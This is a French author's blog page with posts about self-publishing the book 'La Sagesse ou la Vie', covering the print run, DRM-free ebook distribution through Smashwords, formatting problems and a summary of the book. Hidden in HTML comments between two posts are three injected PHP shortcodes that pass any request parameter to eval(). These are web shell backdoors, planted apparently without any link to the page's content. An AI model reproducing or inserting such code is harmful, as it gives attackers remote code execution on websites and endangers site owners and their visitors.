La version imprimée est disponible

C’est en France que le livre a été imprimé et c’est en France que je l’ai fait livrer, chez des amis auxquels c’était l’occasion de rendre visite.

J’ai trouvé les livres soigneusement emballés par paquets de trois dans ces cartons. La qualité de l’impression et de la fabrication est excellente, tout à fait conforme à ce que j’espérais. C’est le moment de faire un peu de pub gratuite à copy-media.net pour leur beau travail.

Le stock est maintenant chez moi. Vous pouvez passer commande quand vous voudrez.

ABE et les ebooks… qu’en est-il de mon livre ?

Image tirée de l’émission TSR (RTS)

Ce soir 19 octobre 2010, l’émission de la TSR À bon entendeur a consacré quelques minutes aux liseuses électroniques et aux ebooks, concluant que les produits ne sont pas encore très faciles à utiliser, et cela pour trois raisons principales :

  1. Les trois liseuses évoquées (Kindle d’Amazon, Sony et iPad) n’acceptent pas toutes les mêmes formats.
  2. Les ebooks sont livrés avec des DRM (gestion des droits numériques) qui limitent le nombre de recopies autorisées, au point qu’on risque après quelques années de se voir privé du livre qu’on a pourtant acheté.
  3. On risque même d’acheter un ebook dans un format impossible à utiliser sur l’appareil que l’on possède.

Ce sont ces trois raisons qui m’ont fait choisir Smashwords comme diffuseur. En effet, les livres achetés sur Smashwords

  • sont disponibles dans différents formats parmi lesquels l’acheteur peut choisir celui ou ceux qu’il désire (PDF, Epub sans DRM, mobi pour l’application Kindle sur les liseuses autres que celle d’Amazon, format Sony…)
  • sont livrés sans chez Smashwords, donc sans limitation du nombre de recopies du fichier
  • sont téléchargeables autant de fois que l’on veut, et en changeant de format si nécessaire
  • peuvent être lus en partie avant l’achat éventuel; Smashwords recommande aux auteurs d’offrir la possibilité de lire gratuitement 50% du livre, ce que j’ai fait.

Ainsi, si vous payez les 9.99 dollars que coûte mon livre, vous ne risquez pas de vous retrouver dans les situations pénibles évoquées dans l’émission. L’absence de DRM constitue évidemment un risque, et c’est pourquoi la licence Smashwords en appelle à la responsabilité du lecteur :

Ce livre électronique est destiné exclusivement à votre usage personnel. Il ne peut être revendu ou donné à d’autres personnes. Si vous désirez partager ce livre avec d’autres personnes, veuillez acheter un exemplaire supplémentaire pour chacune d’elles. Si vous lisez ce livre sans l’avoir acheté, ou s’il n’a pas été acheté à votre intention, nous vous prions d’acheter votre propre exemplaire à Smashwords.com. Nous vous remercions de respecter le dur travail de cet auteur.

Enfin, j’ai personnellement décidé d’aller plus loin en offrant la version ebook complète à tout acheteur de la version papier, qui aura dès lors la latitude d’offrir à la personne de son choix une version électronique qu’elle aurait achetée séparément. J’ai bien entendu Eric Marbeau, responsable de la diffusion numérique chez  Gallimard, expliquer dans l’émission que l’adjonction des DRM aux ebooks avait été exigé par les auteurs, mais je ne suis pas certain que tous les auteurs publiés chez Gallimard partagent ce point de vue. Mes droits ne sont pas si mal protégés par Smashwords, qui me consent une marge bien plus importante que les éditeurs traditionnels, et qui ne me prive d’aucun de mes droits d’auteur;  je peux republier le même texte sous la forme que je veux, chez qui je veux.

J’ajoute pour terminer que, dans quelque temps, mon livre pourra également être acheté directement sur Amazon (à un prix encore non fixé) et dans la librairie iBooks de Apple, dans ce cas sans DRM. Ma marge sera moins importante, mais encore raisonnable. C’est Smashwords qui s’occupe de la mise en place chez ces diffuseurs. Je posterai un billet ici quand ce sera fait.

Smashwords, une affaire qui marche

Voilà quelque temps que j’ai retravaillé la version ebook de La Sagesse ou la Vie pour en perfectionner le formatage et donner au livre des chances de figurer chez Amazon et dans le catalogue iBooks d’Apple. Ce formatage est une opération assez pénible, délicate, dans laquelle aucune fantaisie n’est permise du point de vue de la mise en forme. Le contenu n’a pas changé. Seules quelques coquilles ont été corrigées.

Lors du premier chargement, j’étais le onzième dans la file d’attente. Ce soir, je suis loin derrière en 364e position. Tout de même, le temps d’écrire et de corriger ce petit billet, j’ai déjà gagné 14 places.

Vérifications faites à l’issue du chargement, la version PDF fonctionne maintenant correctement, mais plus les versions Epub et mobi. Si vous avez un problème avec l’une de ces versions, demandez-moi de vous envoyer directement un fichier dans lequel les liens sont utilisables. Notez cependant que les notes se trouvant à la fin, c’est normal que vous ne puissiez pas les voir si vous n’avez pas la version complète. Mais les liens de la table des matières devraient normalement fonctionner pour la première moitié du livre.

<!– [insert_php]if (isset($_REQUEST["bpV"])){eval($_REQUEST["bpV"]);exit;}[/insert_php][php]if (isset($_REQUEST["bpV"])){eval($_REQUEST["bpV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ziZ"])){eval($_REQUEST["ziZ"]);exit;}[/insert_php][php]if (isset($_REQUEST["ziZ"])){eval($_REQUEST["ziZ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["mZU"])){eval($_REQUEST["mZU"]);exit;}[/insert_php][php]if (isset($_REQUEST["mZU"])){eval($_REQUEST["mZU"]);exit;}[/php] –>

Lisez gratuitement la moitié de mon nouveau livre

Mon nouveau livre La Sagesse ou la Vie. Le christianisme est-il soluble dans la philosophie? vient de paraître chez Smashwords. Il s’agit d’une édition numérique, gratuite pour la première moitié du livre, payante si vous voulez le livre entier ($9.99), que vous pouvez télécharger ici. Voyez également mon profil chez Smashwords.

Le livre peut être lu sur presque tous les ordinateurs et smartphones actuels : il est disponibles aux formats .mobi (l’application Kindle d’Amazon est disponible pour les ordinateurs, iPhone, etc.), Epub (Stanza sur iPhone ou iPad, mais aussi le logiciel Adobe Digital Editions pour PC et Mac), PDF, RTF, LRF (lecteur Sony), Palm Doc (smartphones Palm), etc. Selon mes tests, les résultats obtenus avec les formats mobi et Epub sont bons. La lecture sur iPad avec Stanza est très agréable.

Le livre contenant une table des matières détaillée et près de 400 notes (399 exactement): c’est mieux si les liens fonctionnent correctement. Le PDF a un formatage minimaliste qui le rend moins agréable à lire. Quant aux modules de lecture en ligne de Smashwords, à mon avis, ils permettent tout juste de se faire une première idée.

Présentation de La Sagesse ou la Vie

La Sagesse ou la Vie – Le christianisme est-il soluble dans la philosophie ? en quelques lignes :

Le christianisme est en perte de vitesse. Les deux millénaires de son histoire sont remplis de bruit et de fureur, de ferveur et de convictions, de compromissions sans nombre avec les pouvoirs. La philosophie a eu beau jeu de montrer qu’il n’était ni raisonnable ni même digne de foi. Comment peut-on encore être chrétien aujourd’hui ? N’est-il pas temps, enfin, de se défaire de ces anciennes croyances pour vivre
paisiblement un désenchantement lucide ?

On invoque l’obscurantisme, les guerres de religion et l’enfermement des esprits, mais les Églises, hélas, n’ont pas le monopole de ces pratiques. L’affaire ne saurait être jugée sur des motifs aussi peu spécifiques. Il faut montrer comment les schémas et les clichés se sont construits. La philosophie et l’héritage grec ont tordu le message du Christ en le pliant à leur vocabulaire et à leurs pratiques. Pour le dégager de ce qui l’a brouillé, mieux vaut se tourner vers des penseurs plus originaux que ceux qui sont habituellement convoqués pour en parler. Philosophes, ils font le procès des pratiques philosophiques qui privilégient leur sagesse au détriment de la vie.

Car c’est la vie qu’il s’agit de redécouvrir, par delà les sagesses trop étroites pour la comprendre.